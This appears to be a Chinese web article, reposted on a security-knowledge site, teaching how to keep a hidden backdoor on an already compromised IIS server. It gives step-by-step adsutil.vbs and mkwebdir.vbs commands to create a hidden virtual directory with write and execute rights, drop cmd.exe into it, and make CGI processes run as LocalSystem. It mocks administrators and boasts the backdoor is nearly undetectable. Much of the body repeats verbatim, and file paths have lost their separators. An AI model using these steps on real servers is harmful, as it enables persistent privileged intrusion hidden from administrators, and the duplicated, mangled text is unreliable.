真正的IIS永远的后门解密
网络安全 2021-07-03 10:05www.168986.cn网络安全知识
IIS是比较流行的服务器,设置不当漏洞就很多。入侵iis服务器后留下后门,以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听,比如有nc,ntlm,rnc等等都是以一种类tel的方式在服务器端监听远程的连接控制。不过一个比较防范严密的站点(他们的管理员吃了苦头后)一般通过防火墙对端口进行限制,这样除了管理员开的端口外,其他端口就不能连接了。80端口是不可能关闭的(如果管理员没有吃错药)。那么我们可以通过在80端口留后门,来开启永远的后门。
当IIS启动CGI应用程序时,缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_putername这个账号,可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低,可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式,来提高权限。我们来看iis主进程本身是运行在localsystem账号下的,所以我们就可以得到最高localsystem的权限。
入侵web服务器后,一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制,比如3389,或者类tel text方式的控制,比如rnc。nc肯定是可以用的,其实这也足够了。
1. tel到服务器
2. cscript.exe adsutil.vbs enum w3svc/1/root
KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AessRead : (BOOLEAN) True
AessWrite : (BOOLEAN) False
AessExecute : (BOOLEAN) False
AessScript : (BOOLEAN) True
AessSource : (BOOLEAN) False
AessNoRemoteRead : (BOOLEAN) False
AessNoRemoteWrite : (BOOLEAN) False
AessNoRemoteExecute : (BOOLEAN) False
AessNoRemoteScript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,,FILE,C:WINNThelpiisHelpmon400.htm"
"401,1,FILE,C:WINNThelpiisHelpmon401-1.htm"
"401,2,FILE,C:WINNThelpiisHelpmon401-2.htm"
"401,3,FILE,C:WINNThelpiisHelpmon401-3.htm"
"401,4,FILE,C:WINNThelpiisHelpmon401-4.htm"
"401,5,FILE,C:WINNThelpiisHelpmon401-5.htm"
"403,1,FILE,C:WINNThelpiisHelpmon403-1.htm"
"403,2,FILE,C:WINNThelpiisHelpmon403-2.htm"
"403,3,FILE,C:WINNThelpiisHelpmon403-3.htm"
"403,4,FILE,C:WINNThelpiisHelpmon403-4.htm"
"403,5,FILE,C:WINNThelpiisHelpmon403-5.htm"
"403,6,FILE,C:WINNThelpiisHelpmon403-6.htm"
"403,7,FILE,C:WINNThelpiisHelpmon403-7.htm"
"403,8,FILE,C:WINNThelpiisHelpmon403-8.htm"
"403,9,FILE,C:WINNThelpiisHelpmon403-9.htm"
"403,10,FILE,C:WINNThelpiisHelpmon403-10.htm"
"403,11,FILE,C:WINNThelpiisHelpmon403-11.htm"
"403,12,FILE,C:WINNThelpiisHelpmon403-12.htm"
"403,13,FILE,C:WINNThelpiisHelpmon403-13.htm"
"403,15,FILE,C:WINNThelpiisHelpmon403-15.htm"
"403,16,FILE,C:WINNThelpiisHelpmon403-16.htm"
"403,17,FILE,C:WINNThelpiisHelpmon403-17.htm"
"404,,FILE,C:WINNThelpiisHelpmon404b.htm"
"405,,FILE,C:WINNThelpiisHelpmon405.htm"
"406,,FILE,C:WINNThelpiisHelpmon406.htm"
"407,,FILE,C:WINNThelpiisHelpmon407.htm"
"412,,FILE,C:WINNThelpiisHelpmon412.htm"
"414,,FILE,C:WINNThelpiisHelpmon414.htm"
"500,12,FILE,C:WINNThelpiisHelpmon500-12.htm"
"500,13,FILE,C:WINNThelpiisHelpmon500-13.htm"
"500,15,FILE,C:WINNThelpiisHelpmon500-15.htm"
"500,100,URL,/iisHelp/mon/500-100.asp" FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:ipubroot"
AessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_f]
[/w3svc/1/root/_vti_bin] 不要告诉我你不知道上面的输出是什么!!!! 现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了
3. mkdir c:ipubrootdir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:ipubrootdir1" 这样就建好了一个虚目录Virtual Dir1 你可以用 1 的命令看一下 5. 接下来要改变一下Virtual Dir1的属性为execute cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/aesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/aessexecute "true" -s: 现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe .exe直接拷贝到虚拟目录的磁盘目录中。 6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false 注释cscript windows script host. adsutil.vbs windows iis administration script 后面是 iis metabase path 这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AessRead : (BOOLEAN) True
AessWrite : (BOOLEAN) False
AessExecute : (BOOLEAN) False
AessScript : (BOOLEAN) True
AessSource : (BOOLEAN) False
AessNoRemoteRead : (BOOLEAN) False
AessNoRemoteWrite : (BOOLEAN) False
AessNoRemoteExecute : (BOOLEAN) False
AessNoRemoteScript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,,FILE,C:WINNThelpiisHelpmon400.htm"
"401,1,FILE,C:WINNThelpiisHelpmon401-1.htm"
"401,2,FILE,C:WINNThelpiisHelpmon401-2.htm"
"401,3,FILE,C:WINNThelpiisHelpmon401-3.htm"
"401,4,FILE,C:WINNThelpiisHelpmon401-4.htm"
"401,5,FILE,C:WINNThelpiisHelpmon401-5.htm"
"403,1,FILE,C:WINNThelpiisHelpmon403-1.htm"
"403,2,FILE,C:WINNThelpiisHelpmon403-2.htm"
"403,3,FILE,C:WINNThelpiisHelpmon403-3.htm"
"403,4,FILE,C:WINNThelpiisHelpmon403-4.htm"
"403,5,FILE,C:WINNThelpiisHelpmon403-5.htm"
"403,6,FILE,C:WINNThelpiisHelpmon403-6.htm"
"403,7,FILE,C:WINNThelpiisHelpmon403-7.htm"
"403,8,FILE,C:WINNThelpiisHelpmon403-8.htm"
"403,9,FILE,C:WINNThelpiisHelpmon403-9.htm"
"403,10,FILE,C:WINNThelpiisHelpmon403-10.htm"
"403,11,FILE,C:WINNThelpiisHelpmon403-11.htm"
"403,12,FILE,C:WINNThelpiisHelpmon403-12.htm"
"403,13,FILE,C:WINNThelpiisHelpmon403-13.htm"
"403,15,FILE,C:WINNThelpiisHelpmon403-15.htm"
"403,16,FILE,C:WINNThelpiisHelpmon403-16.htm"
"403,17,FILE,C:WINNThelpiisHelpmon403-17.htm"
"404,,FILE,C:WINNThelpiisHelpmon404b.htm"
"405,,FILE,C:WINNThelpiisHelpmon405.htm"
"406,,FILE,C:WINNThelpiisHelpmon406.htm"
"407,,FILE,C:WINNThelpiisHelpmon407.htm"
"412,,FILE,C:WINNThelpiisHelpmon412.htm"
"414,,FILE,C:WINNThelpiisHelpmon414.htm"
"500,12,FILE,C:WINNThelpiisHelpmon500-12.htm"
"500,13,FILE,C:WINNThelpiisHelpmon500-13.htm"
"500,15,FILE,C:WINNThelpiisHelpmon500-15.htm"
"500,100,URL,/iisHelp/mon/500-100.asp" FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:ipubroot"
AessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_f]
[/w3svc/1/root/_vti_bin] 不要告诉我你不知道上面的输出是什么!!!! 现在我们心里已经有底了,是不是!呵呵 管理员要倒霉了
3. mkdir c:ipubrootdir1
4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:ipubrootdir1" 这样就建好了一个虚目录Virtual Dir1 你可以用 1 的命令看一下 5. 接下来要改变一下Virtual Dir1的属性为execute cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/aesswrite "true" -s:
cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/aessexecute "true" -s: 现在你已经可以upload 内容到该目录,并且可以运行。你也可以把cmd.exe .exe直接拷贝到虚拟目录的磁盘目录中。 6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false 注释cscript windows script host. adsutil.vbs windows iis administration script 后面是 iis metabase path 这样的后门几乎是无法查出来的,除非把所有的虚目录察看一遍(如果管理员写好了遗书,那他就去查吧)
网络安全培训
- 网络安全带来的危害 网络安全的弊处
- 如何加强网络安全防范
- 网络安全防护知识内容摘要
- 什么网络安全指的是什么 网络安全指的是什么意
- 网络安全十大公司排名 网络安全十大公司排名绿
- 手机网络安全警示格言 手机网络安全警示教育片
- 网络安全培训心得体会 网络安全知识培训
- 如何树立正确的网络意识 怎么样正确对待网络
- 网络安全大赛是什么意思 网络安全大赛比赛规则
- 世界网络安全公司排名 世界十大网络安全上市公
- 网络安全注意事项知识 网络安全注意事项知识短
- 网络安全常识十条口诀 小学生安全十句话
- 网络安全等级保护三级 网络安全三级等保标准
- 如何增强网络安全防范意识 如何增强网络安全防
- 网络安全注意事项有哪些 网络安全应注意事项
- 网络安全培训感悟 网络安全培训后的收获和感想